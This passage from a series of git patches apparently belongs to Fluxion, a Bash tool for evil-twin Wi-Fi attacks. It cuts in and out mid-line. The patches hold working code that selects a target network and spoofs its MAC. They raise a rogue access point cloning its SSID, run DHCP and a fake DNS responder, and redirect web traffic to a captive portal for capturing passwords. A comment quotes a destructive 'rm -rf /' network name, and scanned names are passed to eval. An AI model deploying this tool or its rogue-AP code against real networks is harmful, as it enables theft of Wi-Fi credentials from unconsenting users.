'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray TargetAPCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - - # Cleanup the workspace to prevent potential bugs/conflicts. - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - if [ ${#TargetAPCandidates[@]} -eq 0 ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" - - echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" - sleep 3 - return 1 - fi -} - -###################################### < Target > ###################################### -function fluxion_unset_target_ap() { - APTargetSSID="" - APTargetChannel="" - APTargetEncryption="" - APTargetMAC="" - APTargetMakerID="" - APTargetMaker="" - APRogueMAC="" -} - -function fluxion_set_target_ap() { - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - fluxion_unset_target_ap - - local TargetAPCandidatesMAC=() - local TargetAPCandidatesClientsCount=() - local TargetAPCandidatesChannel=() - local TargetAPCandidatesSecurity=() - local TargetAPCandidatesSignal=() - local TargetAPCandidatesPower=() - local TargetAPCandidatesESSID=() - local TargetAPCandidatesColor=() - - for candidateAPInfo in "${TargetAPCandidates[@]}"; do - candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") - - local i=${#TargetAPCandidatesMAC[@]} - - TargetAPCandidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) - TargetAPCandidatesClientsCount[i]=$(echo "${TargetAPCandidatesClients[@]}" | grep -c "${TargetAPCandidatesMAC[i]}") - TargetAPCandidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) - TargetAPCandidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) - TargetAPCandidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) - TargetAPCandidatesColor[i]=$([ ${TargetAPCandidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) - - # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. - local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) - TargetAPCandidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") - - local power=${TargetAPCandidatesPower[i]} - if [ $power -eq -1 ]; then - # airodump-ng's man page says -1 means unsupported value. - TargetAPCandidatesQuality[i]="??" - elif [ $power -le $FLUXIONNoiseFloor ]; then - TargetAPCandidatesQuality[i]=0 - elif [ $power -gt $FLUXIONNoiseCeiling ]; then - TargetAPCandidatesQuality[i]=100 - else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - TargetAPCandidatesQuality[i]=$(((${TargetAPCandidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) - fi - done - - local headerTitle=$( - format_center_literals "WIFI LIST" - echo -n "$FormatCenterLiterals\n\n" - ) - - format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") - - format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ - TargetAPCandidatesColor[@] \ - TargetAPCandidatesESSID[@] \ - TargetAPCandidatesQuality[@] \ - TargetAPCandidatesPower[@] \ - TargetAPCandidatesClientsCount[@] \ - TargetAPCandidatesChannel[@] \ - TargetAPCandidatesSecurity[@] \ - TargetAPCandidatesMAC[@] - - echo - - APTargetSSID=${IOQueryFormatFields[1]} - APTargetChannel=${IOQueryFormatFields[5]} - APTargetEncryption=${IOQueryFormatFields[6]} - APTargetMAC=${IOQueryFormatFields[7]} - APTargetMakerID=${APTargetMAC:0:8} - APTargetMaker=$(macchanger -l | grep ${APTargetMakerID,,} | cut -d ' ' -f 5-) - - # Sanitize network ESSID to normalize it and make it safe for manipulation. - # Notice: Why remove these? Because some smartass might decide to name their - # network something like "; rm -rf / ;". If the string isn't sanitized accidentally - # shit'll hit the fan and we'll have an extremely distressed person subit an issue. - # Removing: ' ', '/', '.', '~', '\' - APTargetSSIDClean=$(echo "$APTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g') - - # We'll change a single hex digit from the target AP's MAC address. - # This new MAC address will be used as the rogue AP's MAC address. - local APRogueMACChange=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - APRogueMAC="${APTargetMAC::13}${APRogueMACChange:1:1}${APTargetMAC:14:4}" -} - -function fluxion_show_ap_info() { - format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" - - local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') - - printf "$colorlessFormat" "" "ESSID" "\"$APTargetSSID\" / $APTargetEncryption" "" - printf "$colorlessFormat" "" "Channel" "$APTargetChannel" "" - printf "$colorfullFormat" "" "BSSID" "$APTargetMAC ($CYel${APTargetMaker:-UNKNOWN}$CClr)" "" - - echo -} - -#################################### < AP Service > #################################### -function fluxion_unset_ap_service() { - APRogueService="" -} - -function fluxion_set_ap_service() { - if [ "$APRogueService" ]; then return 0; fi - - fluxion_unset_ap_service - - if [ "$FLUXIONAuto" ]; then - APRogueService="hostapd" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAPServiceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONAPServiceHostapdOption" "$FLUXIONAPServiceAirbaseOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONAPServiceHostapdOption") APRogueService="hostapd" ;; - "$FLUXIONAPServiceAirbaseOption") APRogueService="airbase-ng" ;; - "$FLUXIONGeneralBackOption") - fluxion_unset_ap_service - return 1 - ;; - *) - fluxion_conditional_bail - return 1 - ;; - esac - fi - - # AP Service: Load the service's helper routines. - source "lib/ap/$APRogueService.sh" -} - -###################################### < Hashes > ###################################### -function fluxion_check_hash() { - if [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; then - echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" - sleep 3 - return 1 - fi - - local verifier - - if [ "$FLUXIONAuto" ]; then - verifier="pyrit" - else - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashVerificationMethodPyritOption") verifier="pyrit" ;; - "$FLUXIONHashVerificationMethodAircrackOption") verifier="aircrack-ng" ;; - "$FLUXIONGeneralBackOption") return 1 ;; - esac - fi - - hash_check_handshake "$verifier" "$APTargetHashPath" "$APTargetSSID" "$APTargetMAC" >$FLUXIONOutputDevice - local hashResult=$? - - # A value other than 0 means there's an issue with the hash. - if [ $hashResult -ne 0 ]; then echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" - else echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" - fi - - sleep 3 - - if [ $hashResult -ne 0 ]; then return 1; fi -} - -function fluxion_set_hash_path() { - fluxion_header - echo - echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery" - echo - echo -ne "$FLUXIONAbsolutePathInfo: " - read APTargetHashPath -} - -function fluxion_unset_hash() { - APTargetHashPath="" -} - -function fluxion_set_hash() { - if [ "$APTargetHashPath" ]; then return 0; fi - - fluxion_unset_hash - - # Scan for an existing hash for potential use, if one exists, - # ask the user if we should use it, or to skip it. - if [ -f "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" -a \ - -s "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" ]; then - - if [ ! "$FLUXIONAuto" ]; then - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - printf "Path: %s\n" "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - echo -ne "$FLUXIONVLine ${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] " - - read APTargetHashPathConsidered - - echo - fi - - if [ "$APTargetHashPathConsidered" = "" -o "$APTargetHashPathConsidered" = "y" -o "$APTargetHashPathConsidered" = "Y" ]; then - APTargetHashPath="$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" - fluxion_check_hash - # If the user decides to go back, we must unset. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - fi - fi - - # If the hash was not found, or if it was skipped, - # ask for location or for gathering one. - while [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; do - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONHashSourceQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - local choices=("$FLUXIONHashSourcePathOption" "$FLUXIONHashSourceRescanOption" "$FLUXIONGeneralBackOption") - io_query_choice "" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONHashSourcePathOption") - fluxion_set_hash_path - fluxion_check_hash - ;; - "$FLUXIONHashSourceRescanOption") fluxion_set_hash ;; # Rescan checks hash automatically. - "$FLUXIONGeneralBackOption") - fluxion_unset_hash - return 1 - ;; - esac - - # This conditional is required for return values - # of operation performed in the case statement. - if [ $? -ne 0 ]; then - fluxion_unset_hash - return 1 - fi - done - - # Copy to workspace for hash-required operations. - cp "$APTargetHashPath" "$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap" -} - -###################################### < Attack > ###################################### -function fluxion_unset_attack() { - if [ "$FLUXIONAttack" ]; then unprep_attack - fi - FLUXIONAttack="" -} - -# Select the attack strategy to be used. -function fluxion_set_attack() { - if [ "$FLUXIONAttack" ]; then return 0; fi - - fluxion_unset_attack - - fluxion_header - - echo -e "$FLUXIONVLine $FLUXIONAttackQuery" - echo - - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" - - #local attacksMeta=$(head -n 3 attacks/*/language/$FLUXIONLanguage.sh) - - #local attacksIdentifier - #readarray -t attacksIdentifier < <("`echo "$attacksMeta" | grep -E "^# identifier: " | sed -E 's/# \w+: //'`") - - #local attacksDescription - #readarray -t attacksDescription < <("`echo "$attacksMeta" | grep -E "^# description: " | sed -E 's/# \w+: //'`") - - local attacks - readarray -t attacks < <(ls -1 attacks) - - local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') - - local identifiers=() - - local attack - for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" - if [ "$identifier" ]; then identifiers+=("$identifier") - else identifiers+=("$attack") - fi - done - - attacks+=("$FLUXIONGeneralBackOption") - identifiers+=("$FLUXIONGeneralBackOption") - descriptions+=("") - - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] - - echo - - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then - fluxion_unset_target_ap - fluxion_unset_attack - return 1 - fi - - FLUXIONAttack=${IOQueryFormatFields[0]} - - # Load attack and its corresponding language file. - source "attacks/$FLUXIONAttack/language/$FLUXIONLanguage.sh" - source "attacks/$FLUXIONAttack/attack.sh" - - prep_attack - - if [ $? -ne 0 ]; then - fluxion_unset_attack - return 1 - fi -} - -# Attack -function fluxion_run_attack() { - start_attack - - local choices=("$FLUXIONSelectAnotherAttackOption" "$FLUXIONGeneralExitOption") - io_query_choice "$(io_dynamic_output $FLUXIONAttackInProgressNotice)" choices[@] - - echo - - # IOQueryChoice is a global, meaning, its value is volatile. - # We need to make sure to save the choice before it changes. - local choice="$IOQueryChoice" - - stop_attack - - if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then fluxion_handle_exit; fi - - fluxion_unset_attack -} - -################################### < FLUXION Loop > ################################### -fluxion_set_resolution -fluxion_set_language - -while true; do - fluxion_set_interface - if [ $? -ne 0 ]; then continue; fi - fluxion_set_scanner - if [ $? -ne 0 ]; then continue; fi - fluxion_set_target_ap - if [ $? -ne 0 ]; then continue; fi - fluxion_set_attack - if [ $? -ne 0 ]; then continue; fi - fluxion_run_attack - if [ $? -ne 0 ]; then continue; fi -done - -# FLUXSCRIPT END From eadfceeae7357c4a6071dc7761ceddc4359a673d Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 18 Jan 2018 01:14:32 -0600 Subject: [PATCH 24/45] Upgraded AP services for Fluxion V4. --- lib/ap/airbase-ng.sh | 76 +++++++++++++++++++++++++++++++------------- lib/ap/hostapd.sh | 74 ++++++++++++++++++++++++++---------------- 2 files changed, 100 insertions(+), 50 deletions(-) diff --git a/lib/ap/airbase-ng.sh b/lib/ap/airbase-ng.sh index 802e3e4..c32c58f 100755 --- a/lib/ap/airbase-ng.sh +++ b/lib/ap/airbase-ng.sh @@ -3,55 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW="at0" -VIAP=$WIAccessPoint - -# airbase-ng uses a monitor-mode virtual interface -# and creates a separate interface, atX, for dhcpd. -VIAPAddress="$VIGWNetwork.2" - -# APServiceConfigDirectory=$FLUXIONWorkspacePath +#APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" } -function ap_route() { - ifconfig $VIAP $VIAPAddress netmask 255.255.255.0 - sysctl net.ipv6.conf.at0.disable_ipv6=1 &>$FLUXIONOutputDevice +function ap_service_route() { + local networkSubnet=${APServiceInterfaceAddress%.*} + local networkAddress=$(( ( ${APServiceInterfaceAddress##*.} + 1 ) % 255 )) + + if [ $hostID -eq 0 ]; then + let hostID++ + fi + + # TODO: Dynamically get the airbase-ng tap interface & use below. + # WARNING: Notice the interface below is STATIC, it'll break eventually! + if ! ifconfig "at0" $networkSubnet.$networkAddress \ + netmask 255.255.255.0; then + return 1 + fi + + if ! sysctl net.ipv6.conf.at0.disable_ipv6=1 &> $FLUXIONOutputDevice; then + return 2 + fi } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Spoof virtual interface MAC address. # This is done by airbase-ng automatically. + + # airbase-ng uses a monitor-mode virtual interface + # and creates a separate interface, atX, for dhcpd. + APServiceAccessInterface="at0" } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [airbase-ng]" -e airbase-ng -P -e $APTargetSSID -c $APTargetChannel -a $APRogueMAC $VIAP & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [airbase-ng]" -e \ + airbase-ng -P -e $APServiceSSID -c $APServiceChannel \ + -a $APServiceMAC $APServiceInterface & local parentPID=$! - # Wait till airebase-ng has started and created the extra virtual interface. + # Wait till airebase-ng starts and creates the extra virtual interface. while [ ! "$APServicePID" ]; do sleep 1 APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END diff --git a/lib/ap/hostapd.sh b/lib/ap/hostapd.sh index 14d26c9..93438ed 100755 --- a/lib/ap/hostapd.sh +++ b/lib/ap/hostapd.sh @@ -3,69 +3,87 @@ # ================================================================ # Configuration Section # ================================================================ -VIGW=$WIAccessPoint -VIAP=$WIAccessPoint - -# HostAPD sets the virtual interface mode -# to master, which is supported by dhcpd. -VIAPAddress=$VIGWAddress - APServiceConfigDirectory=$FLUXIONWorkspacePath # ================================================================ #if [ "$APServiceVersion" ]; then return 0; fi #readonly APServiceVersion="1.0" -function ap_stop() { - if [ "$APServicePID" ]; then kill $APServicePID &>$FLUXIONOutputDevice +function ap_service_stop() { + if [ "$APServicePID" ]; then + kill $APServicePID &> $FLUXIONOutputDevice fi APServicePID="" } -function ap_reset() { - ap_stop +function ap_service_reset() { + ap_service_stop # Reset MAC address to original. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger -p $VIAP &>$FLUXIONOutputDevice + macchanger -p $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + APServiceAccessInterface="" + + APServiceChannel="" + APServiceMAC="" + APServiceSSID="" + APServiceInterfaceAddress="" + APServiceInterface="" + } -function ap_route() { - echo "APService: No custom routes for hostapd" >$FLUXIONOutputDevice +function ap_service_route() { + echo "APService: No custom routes for hostapd" > $FLUXIONOutputDevice } -function ap_prep() { - ap_stop +function ap_service_prep() { + if [ ${#@} -lt 5 ]; then return 1; fi + + APServiceInterface=$1 + APServiceInterfaceAddress=$2 + APServiceSSID=$3 + APServiceMAC=$4 + APServiceChannel=$5 + + ap_service_stop # Prepare the hostapd config file. echo "\ -interface=$VIAP +interface=$APServiceInterface driver=nl80211 -ssid=$APTargetSSID -channel=$APTargetChannel" >"$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" +ssid=$APServiceSSID +channel=$APServiceChannel" \ + > "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" # Spoof virtual interface MAC address. - ifconfig $VIAP down + ifconfig $APServiceInterface down sleep 0.5 - macchanger --mac=$APRogueMAC $VIAP &>$FLUXIONOutputDevice + macchanger --mac=$APServiceMAC $APServiceInterface &> $FLUXIONOutputDevice sleep 0.5 - ifconfig $VIAP up + ifconfig $APServiceInterface up sleep 0.5 + + # HostAPD sets the virtual interface mode + # to master, which is supported by dhcpd. + APServiceAccessInterface=$APServiceInterface } -function ap_start() { - ap_stop +function ap_service_start() { + ap_service_stop - xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" -title "FLUXION AP Service [hostapd]" -e hostapd "$APServiceConfigDirectory/$APRogueMAC-hostapd.conf" & + xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \ + -title "FLUXION AP Service [hostapd]" -e \ + hostapd "$APServiceConfigDirectory/$APServiceMAC-hostapd.conf" & local parentPID=$! # Wait till hostapd has started and its virtual interface is ready. @@ -74,7 +92,7 @@ function ap_start() { APServicePID=$(pgrep -P $parentPID) done - ap_route + ap_service_route } # FLUXSCRIPT END From 32466ef94e0d7e526873b22a7327f4ed6818cd6a Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 18 Jan 2018 01:16:47 -0600 Subject: [PATCH 25/45] Minor bug fix and removal of outdated content. --- fluxion | 52 +++++--------------------------------------------- language/en.sh | 4 ---- 2 files changed, 5 insertions(+), 51 deletions(-) diff --git a/fluxion b/fluxion index eabed45..a59906e 100755 --- a/fluxion +++ b/fluxion @@ -1504,9 +1504,11 @@ fluxion_prep_attack() { if [ ! -x "$path/language/$FluxionLanguage.sh" ]; then return 2; fi # Load attack and its corresponding language file. - # Notice: If the attack is a targetted attack, sourcing - # will define the constant FLUXIONAttackTargetted. - source "$path/language/$FluxionLanguage.sh" + # Load english by default to overwrite globals that ARE defined. + source "$path/language/en.sh" + if [ "$FluxionLanguage" != "en" ]; then + source "$path/language/$FluxionLanguage.sh" + fi source "$path/attack.sh" # Check if attack is targetted & set the attack target if so. @@ -1544,20 +1546,6 @@ fluxion_run_attack() { } -# ============================================================ # -# =================== < Test Subroutines > =================== # -# ============================================================ # -subtest1() { - local interface - interface_list_all - for interface in "${InterfaceListAll[@]}"; do - if [ "$interface" = "lo" ]; then continue; fi - echo "$interface" - done -} - - - # ============================================================ # # ================= < Argument Executables > ================= # # ============================================================ # @@ -1566,36 +1554,6 @@ eval set -- "$FLUXIONCLIArguments" # Set environment parameters. while [ "$1" != "--" ]; do case "$1" in -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; - --test) - while true; do - fluxion_get_interface subtest1 - result=$? - if [ $result -ne 0 ]; then - echo Failed to get interface with code $result - exit - fi - - fluxion_allocate_interface "$FluxionInterfaceSelected" - result=$? - if [ $result -ne 0 ]; then - echo Failed to allocate "$FluxionInterfaceSelected" with code $result - exit - fi - interfaceA=${FluxionInterfaces["$FluxionInterfaceSelected"]} - - echo "Allocated $FluxionInterfaceSelected -> $interfaceA" - - fluxion_get_target $interfaceA - result=$? - if [ $result -ne 0 ]; then - echo Failed to get target with code $result - exit - fi - - fluxion_target_show - done - exit - ;; esac shift # Shift new parameters done diff --git a/language/en.sh b/language/en.sh index a540dea..0062403 100755 --- a/language/en.sh +++ b/language/en.sh @@ -53,10 +53,6 @@ FLUXIONScannerChannelMiltipleTip="Multiple channels" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONAPServiceQuery="Select an access point service" -FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr)" -FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)" -# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" FLUXIONHashSourceRescanOption="Rescan handshake directory" From 51c35d470fabbe19aae32c6c824d2492677f98c0 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Thu, 18 Jan 2018 01:17:26 -0600 Subject: [PATCH 26/45] Implemented missing AP service selection & bug fixes. --- attacks/Captive Portal/attack.sh | 128 +++++++++++++++++++------- attacks/Captive Portal/language/en.sh | 4 + 2 files changed, 101 insertions(+), 31 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index dd109ba..4e0f64a 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -16,8 +16,8 @@ CaptivePortalAuthenticationMethodsInfo=( # ============= < Virtual Network Configuration > ============ # # To avoid collapsing with an already existing network, # we'll use a somewhat uncommon network and server IP. -CaptivePortalVIGWAddress="192.168.254.1" -CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*} +CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} # ============================================================ # @@ -103,6 +103,65 @@ captive_portal_set_ap_interface() { fi } +function captive_portal_unset_ap_service() { + if [ ! "$CaptivePortalAPService" ]; then return 1; fi + + CaptivePortalAPService="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi + + if ! interface_is_wireless "$CaptivePortalAPInterface"; then + return 3; + fi +} + +function captive_portal_set_ap_service() { + if [ "$CaptivePortalAPService" ]; then return 0; fi + if ! interface_is_wireless "$CaptivePortalAPInterface"; then + return 0; + fi + + captive_portal_unset_ap_service + + if [ "$FLUXIONAuto" ]; then + CaptivePortalAPService="hostapd" + else + fluxion_header + + echo -e "$FLUXIONVLine $CaptivePortalAPServiceQuery" + echo + + fluxion_target_show + + local choices=( + "$CaptivePortalAPServiceHostapdOption" + "$CaptivePortalAPServiceAirbaseOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$CaptivePortalAPServiceHostapdOption") + CaptivePortalAPService="hostapd" ;; + "$CaptivePortalAPServiceAirbaseOption") + CaptivePortalAPService="airbase-ng" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Invalid AP service selected!" + return 1 + ;; + esac + fi + + # AP Service: Load the service's helper routines. + source "lib/ap/$CaptivePortalAPService.sh" +} + captive_portal_unset_authenticator() { if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi @@ -144,8 +203,7 @@ captive_portal_set_authenticator() { echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ - "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" + fluxion_target_show local choices=( "${CaptivePortalAuthenticationMethods[@]}" @@ -450,8 +508,8 @@ captive_portal_unset_attack() { sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" # Only reset the AP if one has been defined. - if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then - ap_reset + if [ "$CaptivePortalAPService" -a "$(type -t ap_service_reset)" ]; then + ap_service_reset fi } @@ -483,26 +541,33 @@ captive_portal_set_attack() { # AP Service: Prepare service for an attack. - if [ "$APRogueService" ]; then - ap_prep + if [ "$CaptivePortalAPService" ]; then + ap_service_prep \ + "$CaptivePortalAPInterface" \ + "$CaptivePortalGatewayAddress" \ + "$FluxionTargetSSID" \ + "$FluxionTargetRogueMAC" \ + "$FluxionTargetChannel" + + CaptivePortalAccessInterface=$APServiceAccessInterface fi # Generate the dhcpd configuration file, which is - # used to provide DHCP service to APRogue clients. + # used to provide DHCP service to rogue AP clients. echo "\ authoritative; default-lease-time 600; max-lease-time 7200; -subnet $CaptivePortalVIGWNetwork.0 netmask 255.255.255.0 { - option broadcast-address $CaptivePortalVIGWNetwork.255; - option routers $CaptivePortalVIGWAddress; +subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 { + option broadcast-address $CaptivePortalGatewayNetwork.255; + option routers $CaptivePortalGatewayAddress; option subnet-mask 255.255.255.0; - option domain-name-servers $CaptivePortalVIGWAddress; + option domain-name-servers $CaptivePortalGatewayAddress; - range $CaptivePortalVIGWNetwork.100 $CaptivePortalVIGWNetwork.254; + range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254; }\ " >"$FLUXIONWorkspacePath/dhcpd.conf" @@ -528,7 +593,7 @@ fastcgi.server = ( \".php\" => ( ( \"bin-path\" => \"/usr/bin/php-cgi\", - \"socket\" => \"/php.socket\" + \"socket\" => \"/tmp/fluxspace/php.socket\" ) ) ) @@ -632,7 +697,7 @@ class DNSQuery: return packet if __name__ == '__main__': - ip='$CaptivePortalVIGWAddress' + ip='$CaptivePortalGatewayAddress' print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -757,7 +822,7 @@ while [ \$AuthenticatorState = \"running\" ]; do local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalVIGWNetwork.100-110 2>&1 | grep Host)) + DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host)) echo echo -e \" ACCESS POINT:\" @@ -981,7 +1046,7 @@ captive_portal_unset_routes() { sandbox_remove_workfile "$FLUXIONWorkspacePath/ip_forward" fi - ip addr del $CaptivePortalVIGWAddress/24 dev $VIGW 2>/dev/null + ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } # Set up DHCP / WEB server @@ -989,7 +1054,7 @@ captive_portal_unset_routes() { captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. - ip addr add $CaptivePortalVIGWAddress/24 dev $VIGW + ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface # Save the system's routing state to restore later. cp "/proc/sys/net/ipv4/ip_forward" "$FLUXIONWorkspacePath/ip_forward" @@ -1006,9 +1071,9 @@ captive_portal_set_routes() { iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ - --to-destination $CaptivePortalVIGWAddress:80 + --to-destination $CaptivePortalGatewayAddress:80 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ - --to-destination $CaptivePortalVIGWAddress:443 + --to-destination 